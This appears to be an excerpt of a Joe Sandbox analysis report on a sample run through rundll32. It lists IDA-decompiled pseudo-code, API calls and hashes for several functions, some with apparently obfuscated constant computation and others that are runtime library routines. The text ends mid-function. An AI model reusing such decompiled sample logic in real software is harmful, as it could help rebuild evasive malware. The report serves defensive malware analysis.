                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                    • Instruction ID: c2dada4561be5a11cc88119f9f2fddc93ed928f986c03fafae229e471cc7cde2
                                                                                                                    • Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                    • Instruction Fuzzy Hash: BD31F075D02358EBDB06DFA8CA4A2DEBBF1EF44315F208099E501A7265D3B14B98EB40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00339011 Relevance: .1, Instructions: 67COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E00339011(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _t75;
				intOrPtr _t80;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v44 = 0xa2b624;
				_v8 = 0x99eb9;
				_t88 = __edx;
				_v8 = _v8 * 0x25;
				_v8 = _v8 | 0x30e9a4b5;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x3d7f3aa0;
				_v24 = 0x77b72d;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x00e56894;
				_v20 = 0x2ce6cf;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x000f2bb3;
				_v32 = 0xab4cd;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x0007aa85;
				_v28 = 0x1f3eea;
				_v28 = _v28 >> 9;
				_v28 = _v28 ^ 0x0004326d;
				_v12 = 0xc1e4f9;
				_v12 = _v12 ^ 0x329f08e7;
				_v12 = _v12 + 0xcc91;
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0038f912;
				_v16 = 0x3b10d4;
				_t89 = 0x6f;
				_v16 = _v16 / _t89;
				_v16 = _v16 + 0xffff4357;
				_v16 = _v16 ^ 0xf8ba2c27;
				_v16 = _v16 ^ 0x074e6031;
				_v36 = 0x1364c3;
				_v36 = _v36 + 0x503c;
				_v36 = _v36 ^ 0x001cba9a;
				_push(_v20);
				_push(_v24);
				_t75 = E00345BFD(_v32, _v28, _v12, E0034DCF7(_v8, __ecx, _v36));
				_t80 =  *0x353df8; // 0x0
				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
				return E0033A8B0(_v16, _t74, _v36);
			}

















                                                                                                                    0x00339017
                                                                                                                    0x0033901b
                                                                                                                    0x00339022
                                                                                                                    0x0033902f
                                                                                                                    0x00339035
                                                                                                                    0x00339038
                                                                                                                    0x0033903f
                                                                                                                    0x00339043
                                                                                                                    0x0033904a
                                                                                                                    0x00339051
                                                                                                                    0x00339054
                                                                                                                    0x0033905b
                                                                                                                    0x00339062
                                                                                                                    0x00339066
                                                                                                                    0x0033906d
                                                                                                                    0x00339074
                                                                                                                    0x00339078
                                                                                                                    0x0033907f
                                                                                                                    0x00339086
                                                                                                                    0x0033908a
                                                                                                                    0x00339091
                                                                                                                    0x00339098
                                                                                                                    0x0033909f
                                                                                                                    0x003390a6
                                                                                                                    0x003390aa
                                                                                                                    0x003390b1
                                                                                                                    0x003390bb
                                                                                                                    0x003390c0
                                                                                                                    0x003390c3
                                                                                                                    0x003390ca
                                                                                                                    0x003390d1
                                                                                                                    0x003390d8
                                                                                                                    0x003390df
                                                                                                                    0x003390e6
                                                                                                                    0x003390ed
                                                                                                                    0x003390f0
                                                                                                                    0x00339107
                                                                                                                    0x0033910c
                                                                                                                    0x00339117
                                                                                                                    0x0033912b

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cf7847043af1de0d4382fa26af121303816e434008bcb4ae27398eae05750652
                                                                                                                    • Instruction ID: 8cadbab609d6c144148a833f84272ccbfbad687118674c05ee60cea996bf75f1
                                                                                                                    • Opcode Fuzzy Hash: cf7847043af1de0d4382fa26af121303816e434008bcb4ae27398eae05750652
                                                                                                                    • Instruction Fuzzy Hash: 5731F071D0021EEBCF49EFA5D94A4EEBBB1FF44318F208198D421B6250D7B90A59DF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00337FF2 Relevance: .1, Instructions: 54COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00337FF2(void* __edx) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t67;
				void* _t73;

				_v32 = _v32 & 0x00000000;
				_v40 = 0xdad9ef;
				_v36 = 0x9bb390;
				_v28 = 0x653306;
				_v28 = _v28 + 0xffff1628;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x000c892d;
				_v12 = 0x5dd1e8;
				_v12 = _v12 ^ 0xb170c383;
				_v12 = _v12 | 0x2785cc64;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x05b45dea;
				_v8 = 0x56f6d9;
				_v8 = _v8 + 0xc121;
				_t73 = __edx;
				_t67 = 0x41;
				_v8 = _v8 / _t67;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x00a76089;
				_v24 = 0xf5edfd;
				_v24 = _v24 | 0x2f446a90;
				_v24 = _v24 ^ 0x7c479bdf;
				_v24 = _v24 ^ 0x53b1dfb9;
				_v20 = 0xafa903;
				_v20 = _v20 + 0xffff9fdf;
				_v20 = _v20 ^ 0xafba618c;
				_v20 = _v20 ^ 0xaf136809;
				_v16 = 0x74f1b4;
				_v16 = _v16 >> 7;
				_v16 = _v16 | 0x7bde77db;
				_v16 = _v16 ^ 0x7bddce28;
				return E00331E22(_v28, _v24, _t73, E00331DB9(_t67), _v20, _v16);
			}














                                                                                                                    0x00337ff8
                                                                                                                    0x00337ffc
                                                                                                                    0x00338003
                                                                                                                    0x0033800a
                                                                                                                    0x00338011
                                                                                                                    0x00338018
                                                                                                                    0x0033801c
                                                                                                                    0x00338023
                                                                                                                    0x0033802a
                                                                                                                    0x00338031
                                                                                                                    0x00338038
                                                                                                                    0x0033803c
                                                                                                                    0x00338043
                                                                                                                    0x0033804a
                                                                                                                    0x00338055
                                                                                                                    0x0033805b
                                                                                                                    0x0033805e
                                                                                                                    0x00338061
                                                                                                                    0x00338065
                                                                                                                    0x0033806c
                                                                                                                    0x00338073
                                                                                                                    0x0033807a
                                                                                                                    0x00338081
                                                                                                                    0x00338088
                                                                                                                    0x0033808f
                                                                                                                    0x00338096
                                                                                                                    0x0033809d
                                                                                                                    0x003380a4
                                                                                                                    0x003380ab
                                                                                                                    0x003380af
                                                                                                                    0x003380b6
                                                                                                                    0x003380e2

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                    • Instruction ID: 41a9f9af7a3188592d271dfdf22bc6ee7cfe0cd6ef14466f74770672268383c6
                                                                                                                    • Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                    • Instruction Fuzzy Hash: 4921EFB2C0131EEBCB48DFE5D98A4EEFBB0BB14314F208189D512B6264C3B40B498F91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00344087 Relevance: .0, Instructions: 2COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00344087() {

				return  *[fs:0x30];
			}



                                                                                                                    0x0034408d

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10014DA8 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 84%
                                                                                                                    			E10014DA8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x100545cc; // 0x3f6a93de
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E10030D27(E10043F3E, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E10014522, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E100312A0( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E10030030(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E10014538(_t181 - 0x3c, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E100145E8(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E1001461E(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E10014C3E(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10014B71( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1002F81E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}
































                                                                                                                    0x10014da8
                                                                                                                    0x10014da9
                                                                                                                    0x10014daf
                                                                                                                    0x10014db3
                                                                                                                    0x10014dba
                                                                                                                    0x10014dc0
                                                                                                                    0x10014dc7
                                                                                                                    0x10014dd8
                                                                                                                    0x10014ddf
                                                                                                                    0x10014de2
                                                                                                                    0x10014de5
                                                                                                                    0x10014de8
                                                                                                                    0x10014df6
                                                                                                                    0x10014df9
                                                                                                                    0x10014dfd
                                                                                                                    0x10014ecb
                                                                                                                    0x10014f87
                                                                                                                    0x10014f8b
                                                                                                                    0x10014f9f
                                                                                                                    0x10014fa2
                                                                                                                    0x10014fac
                                                                                                                    0x10014fb2
                                                                                                                    0x10014fca
                                                                                                                    0x10014fd6
                                                                                                                    0x10014fdb
                                                                                                                    0x10014fde
                                                                                                                    0x10014fde
                                                                                                                    0x10014fac
                                                                                                                    0x10014ed1
                                                                                                                    0x10014ee5
                                                                                                                    0x10014ef0
                                                                                                                    0x10014f06
                                                                                                                    0x10014f15
                                                                                                                    0x10014f2d
                                                                                                                    0x10014f32
                                                                                                                    0x10014f38
                                                                                                                    0x10014f44
                                                                                                                    0x10014f47
                                                                                                                    0x10014f59
                                                                                                                    0x10014f65
                                                                                                                    0x10014f6a
                                                                                                                    0x10014f6d
                                                                                                                    0x10014f6d
                                                                                                                    0x10014f38
                                                                                                                    0x10014f77
                                                                                                                    0x10014f77
                                                                                                                    0x10014ef0
                                                                                                                    0x10014e03
                                                                                                                    0x10014e0b
                                                                                                                    0x10014e0e
                                                                                                                    0x10014e11
                                                                                                                    0x10014e23
                                                                                                                    0x10014e2c
                                                                                                                    0x10014e34
                                                                                                                    0x10014e41
                                                                                                                    0x10014e44
                                                                                                                    0x10014e4b
                                                                                                                    0x10014e4f
                                                                                                                    0x10014e53
                                                                                                                    0x10014e56
                                                                                                                    0x10014e59
                                                                                                                    0x10014e66
                                                                                                                    0x10014e72
                                                                                                                    0x10014e77
                                                                                                                    0x10014e7a
                                                                                                                    0x10014e7a
                                                                                                                    0x10014e81
                                                                                                                    0x10014e81
                                                                                                                    0x10014e86
                                                                                                                    0x10014e89
                                                                                                                    0x10014ea0
                                                                                                                    0x10014ea7
                                                                                                                    0x10014eb6
                                                                                                                    0x10014fec
                                                                                                                    0x10014ff3
                                                                                                                    0x10015003
                                                                                                                    0x10015006
                                                                                                                    0x10015009
                                                                                                                    0x10015010
                                                                                                                    0x10015013
                                                                                                                    0x1001501a
                                                                                                                    0x10015026
                                                                                                                    0x10015030
                                                                                                                    0x10015035
                                                                                                                    0x10015035
                                                                                                                    0x1001503a
                                                                                                                    0x1001503f
                                                                                                                    0x1001505c
                                                                                                                    0x1001505c
                                                                                                                    0x10015063
                                                                                                                    0x10015068
                                                                                                                    0x00000000
                                                                                                                    0x10015041
                                                                                                                    0x10015041
                                                                                                                    0x10015048
                                                                                                                    0x10015050
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10015052
                                                                                                                    0x10015056
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10015058
                                                                                                                    0x1001505a
                                                                                                                    0x00000000
                                                                                                                    0x1001505a
                                                                                                                    0x10014ebc
                                                                                                                    0x10014ebc
                                                                                                                    0x1001506a
                                                                                                                    0x1001506d
                                                                                                                    0x10015075
                                                                                                                    0x10015076
                                                                                                                    0x10015077
                                                                                                                    0x1001508c
                                                                                                                    0x1001508c

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                    • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                    • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                    • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                    • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                    • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                    • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014F68
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                    • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                    • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014FD9
                                                                                                                    • _memset.LIBCMT ref: 10014FF3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                    • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                    • API String ID: 434808117-483790700
                                                                                                                    • Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                    • Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
                                                                                                                    • Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                    • Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002E129 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E1002E129(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}




                                                                                                                    0x1002e136
                                                                                                                    0x1002e13f
                                                                                                                    0x1002e148
                                                                                                                    0x1002e152
                                                                                                                    0x1002e15c
                                                                                                                    0x1002e166
                                                                                                                    0x1002e170
                                                                                                                    0x1002e17a
                                                                                                                    0x1002e184
                                                                                                                    0x1002e18e
                                                                                                                    0x1002e198
                                                                                                                    0x1002e1a2
                                                                                                                    0x1002e1a7
                                                                                                                    0x1002e1ae

                                                                                                                    APIs
                                                                                                                    • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                    • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                    • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                    • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                    • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                    • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                    • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                    • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                    • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                    • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                    • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                    • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ClipboardFormatRegister
                                                                                                                    • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                    • API String ID: 1228543026-2889995556
                                                                                                                    • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                    • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                    • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                    • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1003548E Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E1003548E(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				void* _t37;
				struct HINSTANCE__* _t38;
				void* _t41;
				void* _t43;

				_t37 = __edx;
				_t30 = __ebx;
				_t38 = GetModuleHandleA("KERNEL32.DLL");
				if(_t38 != 0) {
					 *0x10057934 = GetProcAddress(_t38, "FlsAlloc");
					 *0x10057938 = GetProcAddress(_t38, "FlsGetValue");
					 *0x1005793c = GetProcAddress(_t38, "FlsSetValue");
					_t7 = GetProcAddress(_t38, "FlsFree");
					__eflags =  *0x10057934;
					_t41 = TlsSetValue;
					 *0x10057940 = _t7;
					if( *0x10057934 == 0) {
						L6:
						 *0x10057938 = TlsGetValue;
						 *0x10057934 = E10035111;
						 *0x1005793c = _t41;
						 *0x10057940 = TlsFree;
					} else {
						__eflags =  *0x10057938;
						if( *0x10057938 == 0) {
							goto L6;
						} else {
							__eflags =  *0x1005793c;
							if( *0x1005793c == 0) {
								goto L6;
